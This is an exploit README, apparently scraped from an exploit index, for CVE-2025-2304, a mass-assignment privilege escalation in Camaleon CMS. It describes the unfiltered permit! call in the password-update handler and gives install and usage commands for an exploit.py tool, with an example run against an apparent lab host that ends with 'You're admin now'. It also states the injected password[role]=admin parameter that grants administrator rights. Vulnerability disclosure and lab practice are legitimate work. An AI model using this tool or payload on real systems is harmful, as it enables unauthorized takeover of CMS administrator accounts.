Share
## https://sploitus.com/exploit?id=EEA8B8A6-7D93-5960-98E3-B3A6013CABBA
# CVE-2025-2304 Exploit

Camaleon CMS Vulnerable to Privilege Escalation through a Mass Assignment

## Vulnerability Description

A Privilege Escalation through a Mass Assignment exists in Camaleon CMS

When a user wishes to change his password, the 'updated_ajax' method of the UsersController is called. The vulnerability stems from the use of the dangerous permit! method, which allows all parameters to pass through without any filtering.

## Requirements
```bash
pip install requests beautifulsoup4
```

## Usage
```bash
python exploit.py --url http://target.com -u username -p password
```

### Arguments

- `--url` - Base URL of the vulnerable application
- `-u` - Username for authentication
- `-p` - Password for authentication

## Example
```bash
python exploit.py --url http://facts.htb -u krrish -p krrish
```

Output:
```
[*] Logging in as krrish...
[*] Exploiting...
[+] Exploited! You're admin now
```

## How It Works

1. Authenticates with provided credentials
2. Sends password update request with injected `password[role]=admin` parameter
3. Escalates user privileges to administrator

## Disclaimer

This tool is for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal.

## Author

https://x.com/krrishbhurani

https://www.linkedin.com/in/krrish-bhurani/